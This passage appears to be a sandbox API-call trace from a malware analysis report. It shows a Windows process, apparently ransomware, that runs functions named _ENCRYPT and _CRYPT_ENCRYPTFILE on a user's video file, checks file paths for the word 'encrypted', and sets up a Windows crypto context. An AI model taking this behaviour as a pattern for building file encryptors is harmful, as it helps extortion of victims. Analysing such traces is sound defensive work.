lpUsedDefaultChar=0x0) returned 12 [0043.897] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.897] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.897] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.897] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.897] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.897] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.897] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.897] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.898] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.898] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.898] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.898] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2afed100, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0xfdec7b10, ftLastAccessTime.dwHighDateTime=0x1d5c191, ftLastWriteTime.dwLowDateTime=0xfdec7b10, ftLastWriteTime.dwHighDateTime=0x1d5c191, nFileSizeHigh=0x0, nFileSizeLow=0x17ea7, dwReserved0=0x0, dwReserved1=0x777648, cFileName="s u.mkv", cAlternateFileName="SU1095~1.MKV")) returned 0x7c20c0 [0043.899] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.899] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2afed100, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0xfdec7b10, ftLastAccessTime.dwHighDateTime=0x1d5c191, ftLastWriteTime.dwLowDateTime=0xfdec7b10, ftLastWriteTime.dwHighDateTime=0x1d5c191, nFileSizeHigh=0x0, nFileSizeLow=0x17ea7, dwReserved0=0x0, dwReserved1=0x777648, cFileName="s u.mkv", cAlternateFileName="SU1095~1.MKV")) returned 0x7c20c0 [0043.899] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.899] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.900] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\s u.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.901] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0043.901] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.901] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.901] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0043.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.901] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.901] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.902] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.902] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.902] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.902] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\s u.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2afed100, ftCreationTime.dwHighDateTime=0x1d5bf96, ftLastAccessTime.dwLowDateTime=0xfdec7b10, ftLastAccessTime.dwHighDateTime=0x1d5c191, ftLastWriteTime.dwLowDateTime=0xfdec7b10, ftLastWriteTime.dwHighDateTime=0x1d5c191, nFileSizeHigh=0x0, nFileSizeLow=0x17ea7, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="s u.mkv", cAlternateFileName="SU1095~1.MKV")) returned 0x7c2240 [0043.902] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.902] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0043.902] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.902] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.902] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.903] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.903] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.903] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.903] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.903] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.903] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.903] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.903] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.903] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.903] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0043.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.903] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0043.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.904] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.904] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.904] PeekMessageW 